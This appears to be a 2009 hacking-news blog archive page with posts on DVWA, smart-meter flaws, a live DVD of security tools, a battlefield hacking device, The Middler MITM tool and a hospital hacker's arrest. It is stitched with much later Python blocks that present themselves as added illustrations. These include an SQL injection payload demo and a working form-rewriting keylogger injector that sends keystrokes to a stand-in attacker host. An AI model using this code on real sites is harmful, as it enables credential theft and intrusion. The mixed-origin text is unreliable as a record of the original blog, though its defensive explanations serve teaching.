Archive | July, 2009

Damn Vulnerable Web App – Learn & Practise Web Hacking

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is, as the name says, damn vulnerable. Its main goals are to be lightweight, easy to use and full of vulnerabilities to exploit. It is used to learn or teach the art of web application security.

Vulnerabilities

  • SQL Injection
  • XSS (Cross Site Scripting)
  • LFI (Local File Inclusion)
  • RFI (Remote File Inclusion)
  • Command Execution
  • Upload Script
  • Login Brute Force
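As an added illustration of the first item on that list (this is example code written for this page, not DVWA's own PHP; DVWA runs on MySQL, and sqlite3 is used here purely so the snippet runs offline with a constructed three-row users table), the vulnerable lookup below splices user input straight into the query text, which is exactly the pattern a DVWA SQL injection page exists to teach. The parameterised lookup beside it is the fix: the statement text is fixed and the value is bound as data, so the same payload matches nothing.

```python
import sqlite3

# Constructed stand-in for DVWA's MySQL users table (DVWA itself is PHP/MySQL;
# sqlite3 is used here only so the example runs offline).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Pablo", "Picasso")],
    )
    return conn

def lookup_vulnerable(conn, user_id):
    # The classic bug: untrusted input is spliced into the SQL text, so quotes
    # in the input change the structure of the statement rather than its data.
    query = (
        "SELECT first_name, last_name FROM users "
        "WHERE user_id = '" + user_id + "'"
    )
    return conn.execute(query).fetchall()

def lookup_parameterized(conn, user_id):
    # The fix: the statement text is constant and the value is bound separately,
    # so whatever the input contains it can only ever be compared as data.
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()

# Textbook tautology payload. The trailing quote is closed by the quote the
# vulnerable query appends, leaving:  WHERE user_id = '' OR '1'='1'
PAYLOAD = "' OR '1'='1"

def demo():
    """Run both lookups with a benign id and with the payload."""
    conn = make_db()
    return {
        "vuln_benign": lookup_vulnerable(conn, "2"),
        "vuln_payload": lookup_vulnerable(conn, PAYLOAD),      # every row leaks
        "param_benign": lookup_parameterized(conn, "2"),
        "param_payload": lookup_parameterized(conn, PAYLOAD),  # no rows
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:13s} -> {rows}")
```

Running it shows the vulnerable lookup returning all three rows for the payload while the parameterised one returns none; that difference, not input filtering, is the point to take away from the SQL injection exercises.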

Changes


  • Added Acunetix scan report.
  • All links use http://hiderefer.com to hide referrer header.
  • Updated/added ‘more info’ links.
  • Moved change log info to CHANGELOG.txt.
  • Fixed the exec.php UTF-8 output.
  • Moved Help/View source buttons to footer.
  • Fixed phpInfo bug.
  • Made DVWA IE friendly.
  • Fixed html bugs.
  • Improved README.txt and fixed typos.
  • Made SQL injection possible in sqli_med.php.

WARNING

It should come as no shock, but this application is damn vulnerable! Do not upload it to your hosting provider's public html folder or to any working web server, as it will be hacked. It is recommended that you download and install XAMPP on a local machine inside your LAN that is used solely for testing.

You can download DVWA 1.0.4 here:

dvwa_v1.0.4.zip

Or read more here.


Posted in: Exploits/Vulnerabilities, Programming, Web Hacking


Smart Grid Security Risks – Not So Smart Electricity Meters

You might recall we've discussed the security of Industrial Control Systems before; the latest 'evolution' is the so-called Smart Grid.

Which, in all honesty, doesn't seem to be very smart at all. In basic terms, the idea is to turn the power grid into a two-way communication medium, so that consumers' homes report back to the grid what they are using and can be disconnected via software rather than requiring physical intervention.

The scary part is that there's no encryption and many operations are carried out without any authentication, meaning that with a little reverse engineering you could probably cut the power to anyone on the not-so-smart grid.

New electricity meters being rolled out to millions of homes and businesses are riddled with security bugs that could bring down the power grid, according to a security researcher who plans to demonstrate several attacks at a security conference next month.

The so-called smart meters for the first time provide two-way communications between electricity users and the power plants that serve them. Prodded by billions of dollars from President Obama’s economic stimulus package, utilities in Seattle, Houston, Miami, and elsewhere are racing to install them as part of a plan to make the power grid more efficient. Their counterparts throughout Europe are also spending heavily on the new technology.

There’s just one problem: The newfangled meters needed to make the smart grid work are built on buggy software that’s easily hacked, said Mike Davis, a senior security consultant for IOActive. The vast majority of them use no encryption and ask for no authentication before carrying out sensitive functions such as running software updates and severing customers from the power grid. The vulnerabilities, he said, are ripe for abuse.

An embedded hardware system that accepts new firmware without authentication, with nothing encrypted? That is a hacker's playground!

I hope they consider re-architecting the whole system ASAP on a secure platform and rolling that out as a software update. This is no small matter, this is the power grid we are talking about here – lives and businesses can be seriously affected by someone malicious who wanted to screw up the system.

Imagine if you work out the system and get in there first, installing your own firmware which won't accept any more updates from the main Grid system.
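To make the "no authentication before running software updates" point concrete, here is an added example written for this page (not any vendor's or IOActive's code): a minimal meter-side update handler in two versions. The message layout (4-byte length, image, 32-byte HMAC-SHA256 tag), the device key and the firmware strings are all constructed assumptions. The unauthenticated version installs whatever arrives, which is what lets an attacker push firmware that then ignores the utility's own updates; the authenticated version only installs an image whose tag verifies under the device key and whose declared length matches what was received.

```python
import hashlib
import hmac
import struct

# Constructed example, not any vendor's protocol. Assumed message layout:
#   4-byte big-endian image length | firmware image | 32-byte HMAC-SHA256 tag
# The key is a placeholder. A real deployment would provision one per device,
# or better, verify a signature so that a key pulled out of one meter cannot
# sign firmware for the whole fleet.
DEVICE_KEY = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f00f1e2d3c4b5a69788796a5b4c3d2e1f0")
TAG_LEN = 32

def pack_update(firmware, key=None):
    """Build an update message. With key=None the tag is left blank, which is
    all an attacker without the key can send to an unauthenticated meter."""
    body = struct.pack(">I", len(firmware)) + firmware
    tag = hmac.new(key, body, hashlib.sha256).digest() if key else b"\x00" * TAG_LEN
    return body + tag

def accept_update_unauthenticated(message):
    """The behaviour the article describes: trust whatever arrives."""
    (length,) = struct.unpack(">I", message[:4])
    return message[4:4 + length]

def accept_update_authenticated(message, key):
    """Install the image only if the tag verifies under the device key and the
    declared length matches the bytes actually received. Returns None on any
    failure so the caller keeps running the current firmware."""
    if len(message) < 4 + TAG_LEN:
        return None
    body, tag = message[:-TAG_LEN], message[-TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        return None
    (length,) = struct.unpack(">I", body[:4])
    if length != len(body) - 4:
        return None
    return body[4:]

def demo():
    genuine = pack_update(b"METER-FW-2.1", DEVICE_KEY)
    forged = pack_update(b"ATTACKER-FW", None)
    tampered = genuine[:4] + b"X" + genuine[5:]   # one byte of the image changed
    return {
        "unauth_accepts_forged": accept_update_unauthenticated(forged),
        "auth_accepts_genuine": accept_update_authenticated(genuine, DEVICE_KEY),
        "auth_rejects_forged": accept_update_authenticated(forged, DEVICE_KEY),
        "auth_rejects_tampered": accept_update_authenticated(tampered, DEVICE_KEY),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```

Two caveats a practitioner would add: an HMAC only fixes the authentication gap, not the missing encryption, and a shared symmetric key that can be read out of any one meter is a weak root of trust, so a signature verified against a public key burned into the device, plus a version check to stop rollback to an older vulnerable image, is the design to aim for.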

“For an embedded platform, they’re kind of scary,” he said. “It’s really not designed from the ground up for security. Just imagine if somebody is outside your house and has the unique identifier that’s printed on your meter.”

Companies that make gear for smart grids include GE Energy, The ABB Group, Sensus Metering, Itron and Landis+Gyr.

One deficiency common among many of the meters is the use of insecure programming functions, such as memcpy() and strcpy(), which are two of the most common sources of exploitable software bugs. In many cases, the devices use general purpose hardware and software that aren’t designed for highly targeted or mission critical systems.

And all paid for by the new president and his generous stimulus packages. It seems like the whole thing has been taped together with band-aids.

There's no excuse at all for using insecure programming functions in this day and age; I mean, it's 2009, for goodness' sake.

How long has C been around now? And how long has the concept of secure programming been around, especially for critical infrastructure systems like this?

Source: The Register (Thanks Alan)


Posted in: Hardware Hacking, Legal Issues


MultiISO LiveDVD v1.0 – BackTrack, Knoppix & Ophcrack

MultiISO LiveDVD is an integrated Live DVD that combines several of the popular Live CD ISOs already available on the internet. It can be used for security reconnaissance, vulnerability identification, penetration testing, system rescue and recovery, and as a media centre. It's an all-in-one, multipurpose LiveDVD; there's something in it for everyone.

MultiISO LiveDVD Version 1.0 consists of:

  • Backtrack 3
  • Damn Small Linux (DSL) 4.2.5
  • GeeXboX 1.1
  • Damn Vulnerable Linux (Strychnine) 1.4 edition
  • Knoppix 5.1.1
  • MPentoo 2006.1
  • Ophcrack 1.2.2 (remastered to contain SSTIC04-5k [720MB] table sets)
  • Puppy Linux 3.01
  • Byzantine OS i586-20040404

You can download MultiISO LiveDVD here (to conserve bandwidth only a Torrent link is available; please seed after downloading):

Torrent: EmErgEs_MultiBOOT_ISO.torrent (4.03GB)

MD5SUM: 1b1f37ed6b6f958cde0529a8a1f06637
SHA1SUM: 593ffbfa3c4b665220dcd63b2e4b77bacde5237d

Or read more here.


Posted in: Hacking Tools, Linux Hacking, Network Hacking, Password Cracking


Military Communications Hacking – Script Kiddy Style

Ah, now this is interesting, and scary in a way. Script kiddies with guns!

Script kiddies going to war, or is it turning soldiers into script kiddies? Who knows.

Anyway, the US military has decided to turn its soldiers into walking hackers, with an all-in-one hacking device that can penetrate satellite links, VoIP networks and ordinary information systems.

As the US military strives to boost its ability to wage cyber warfare, it’s looking for ways to make it easier for non-expert soldiers on the front lines to wreak havoc on enemy networks.

Enter a new generation of attack devices that is packaged to be brought into the battlefield and used by non-specialists to penetrate satellites, voice over internet networks, and supervisory control and data acquisition systems. Aviation Week recently got a peek at one device and provided a rich description of its features.

The device is designed to allow US forces to test enemy networks for a wide range of vulnerabilities and then synthesize the results so they can be acted on quickly. It offers touch-screen dashboards and sliders to make enumeration and penetration more intuitive. One display shows a schematic of an enemy network and identifies its nodes. A sliding lever can be moved to increase an attack or dial it down to reduce collateral damage.

Seems like point-and-click hacking has been taken to a new level and can now be done from a mobile device on the move.

It takes virtually no skill at all with sliders and dials.

I'd love to get my hands on one of these devices just to check it out and see how it actually works, run a packet sniffer on the wire and see if it's actually just a black box with Metasploit inside and a fancy interface.

The device is designed to take a slew of algorithms for monitoring and penetrating networks and put them into an easy-to-use package. Think of it as a hack-by-numbers gadget for combat forces.

“Right now, all that information is in the head of a few guys that do computer network operations and there is no training system,” one researcher told Aviation Week.

There’s much more here.

Sounds pretty interesting either way, I hope some more news pops up about this in the future and we can get a better look at the device.

I’d love to see some pictures and a video demonstration; I’d imagine, though, that as always they will be rather secretive about it.

Anyway if anyone finds out more info on this, let us know!

Source: The Register (Thanks Simon)


Posted in: Hacking Tools, Hardware Hacking, Network Hacking


The Middler – User Session Cloning & MITM Tool

The Middler is a Man in the Middle tool to demonstrate protocol middling attacks. Led by Jay Beale, the project involves a team of authors including InGuardians agents Justin Searle and Matt Carpenter. The Middler is intended to man in the middle, or “middle” for short, every protocol for which we can create code.

In our first alpha release, we released a core built by Matt and Jay, with introductory plug-ins by Justin and InGuardians agent Tom Liston. It runs on Linux and Mac OS X, with most of the code functional on Windows and BSD Unix.

The current codebase is in the alpha state, but a beta release is coming soon, with better documentation (see the wiki), easier installation, and even more plug-ins.

Plug-ins

  • plugin-beef.py – inject the Browser Exploitation Framework (BeEF) into any HTTP requests originating on the local LAN
  • plugin-metasploit.py – inject an IFRAME into cleartext (HTTP) requests that loads Metasploit browser exploits
  • plugin-keylogger.py – inject a JavaScript onKeyPress event handler into cleartext forms that get submitted via HTTPS, forcing the browser to send the password character-by-character to the attacker’s server before the form is submitted.
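The keylogger plug-in description is worth unpacking, because the attack does not depend on the form posting to HTTPS at all; it depends on the page that contains the form arriving over cleartext HTTP, where an on-path attacker can rewrite it. The example below is added for this page and is not The Middler's code: it rewrites form tags on a cleartext page the way the description says, refuses to touch a page fetched over HTTPS (the attacker simply cannot), and includes an audit helper that lists the forms on a page that are exposed this way. The sample page, hostnames, collector URL and the exact shape of the injected handler are all constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: a webmail login page delivered over plain HTTP whose form
# posts to HTTPS. Hostnames and the collector URL are placeholders.
SAMPLE_PAGE_URL = "http://mail.example.test/"
SAMPLE_HTML = """<html><body>
<form action="https://mail.example.test/login" method="post">
  <input name="user"><input name="pass" type="password"><input type="submit">
</form>
</body></html>"""
COLLECTOR = "http://attacker.example.test/k"

def keypress_handler(collector):
    # Assumed shape of the injected handler: each keystroke becomes an image
    # request to the collector, so characters leave the browser one at a time
    # before the form is ever submitted over HTTPS. Keypress events raised in
    # the inputs bubble up to the form, so one handler on <form> sees them all.
    return ('onkeypress="(new Image()).src=\'' + collector
            + '?c=\'+encodeURIComponent(String.fromCharCode(event.which||event.keyCode))"')

FORM_TAG = re.compile(r"<form\b([^>]*)>", re.IGNORECASE)

def inject_keylogger(page_url, html, collector=COLLECTOR):
    """Rewrite every <form> on a cleartext page. Returns (html, forms_touched).
    A page fetched over HTTPS is returned untouched: an on-path attacker cannot
    modify it, and that is the whole precondition of the attack."""
    if urlsplit(page_url).scheme != "http":
        return html, 0
    touched = 0

    def add_handler(match):
        nonlocal touched
        attrs = match.group(1)
        if "onkeypress=" in attrs.lower():   # already has a handler; leave it
            return match.group(0)
        touched += 1
        return "<form" + attrs + " " + keypress_handler(collector) + ">"

    return FORM_TAG.sub(add_handler, html), touched

ACTION_ATTR = re.compile(r"""<form\b[^>]*\baction=["']([^"']+)["']""", re.IGNORECASE)

def middleable_forms(page_url, html):
    """Audit helper: the form actions an on-path attacker could middle this way.
    Posting to https:// does not help when the form itself arrived over http://."""
    if urlsplit(page_url).scheme != "http":
        return []
    return ACTION_ATTR.findall(html)

if __name__ == "__main__":
    rewritten, n = inject_keylogger(SAMPLE_PAGE_URL, SAMPLE_HTML)
    print(n, "form(s) middled; exposed actions:",
          middleable_forms(SAMPLE_PAGE_URL, SAMPLE_HTML))
    print(rewritten)
```

The defensive reading is the useful one: the only real fix is to serve the page containing the login form over HTTPS as well (and, with browsers that support it, HSTS, so the cleartext request is never made), which is exactly why `middleable_forms` is the check to run against any site that still delivers its login page over HTTP.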

The author team has done a tremendous amount of research, design and pseudo-code work, fleshing out attacks on web-based e-mail systems and social networking sites.

Dependencies

The Middler depends on the following Python modules:

  • scapy
  • libpcap
  • readline
  • libdnet
  • beautifulsoup

You can download The Middler here:

middler-alpha-2009022301.tgz

Or read more here.


Posted in: Hacking Tools, Network Hacking, Privacy


Hospital Hacker GhostExodus Owns Himself – Arrested

This story actually gave me a lot of LULZ; how stupid can you be, seriously? Man, this guy made so many mistakes for someone so paranoid (he had a webcam set up outside his apartment door so he could see who was coming).

But then he exposed his IP address on IRC, posted his face on some freaky vampire site and posted screenshots of the HVAC system he ‘owned’ on a forum.

He wasn’t exactly making it hard for someone to find him, especially seeing as he actually WORKED IN THE HOSPITAL.

The leader of a malicious hacker collective who used his job as a security guard to breach sensitive Texas hospital computers has been arrested just days before his group planned a “massive DDoS” attack for the July 4 Independence Day holiday.

Jesse William McGraw, 25, of Arlington, Texas, was taken into custody late Friday evening after posting screenshots showing he had complete control of computers that administered air-conditioning systems at The Carrell Clinic in Dallas, federal prosecutors said. McGraw also brazenly posted videos showing him installing malware on hospital computers that made them part of a botnet he operated, said a network security expert, whose sleuthing uncovered the breach.

As a contract security guard at the hospital, McGraw had no authorized access to any of its computers. But that didn’t stop the miscreant, who went by the handle GhostExodus, from taping himself as he walked down the halls of the hospital with a blue security guard uniform poking out through a gray hoody, as he bragged about gaining control over sensitive computers.

If there was ever an original script kiddy, I think this guy fits the bill perfectly.

Seems like his l33t hacking skills extend to walking into rooms he has access to (with a security card) and taking some screenshots!

Or perhaps sometimes he even booted in with BackTrack and reset the passwords.


“It’s a unique mindset among these hackers,” said Wesley McGrew, a 29-year-old PhD network security researcher at Mississippi State University. “It’s all about respect and fame and the respect of their equally weird peers.”

According to McGrew and federal prosecutors in Dallas, McGraw was the leader of a hacker gang known as the Electronik Tribulation Army. He had recently posted videos admonishing fellow hackers to carry out a “massive DDoS,” or distributed denial of service, attack on July 4, a date he called “Devil’s Day”. While the target and other details of the attack are unknown, the investigators are taking the threat seriously because McGraw, prior to his arrest, had tendered his resignation from his security guard job, effective July 3.

According to court documents, hospital officials had experienced problems with their HVAC, or heating, ventilation and air-conditioning, units and were perplexed why none of the system alarms had gone off as programmed. Had they seen screenshots posted here by someone calling themselves GhostExodus, they would have known why. The images showed the HVAC control window for the hospital’s surgery unit. A test alarm setting was turned to “inactive.”

“You almost can’t help it ya know,” GhostExodus writes. “It must be done!”

Yeah, you just can’t help messing with the critical HVAC system of a hospital, YOU TOOL. What is the point of that anyway, other than bragging rights (which will only impress other script kiddies)?

Who knows…I guess if he had any real skills he wouldn’t be working as a security guard and he’d actually be using his talent to make some real bank.

Oh well, good luck to you I say GhostExodus.

Source: The Register


Posted in: General Hacking, Legal Issues, Malware
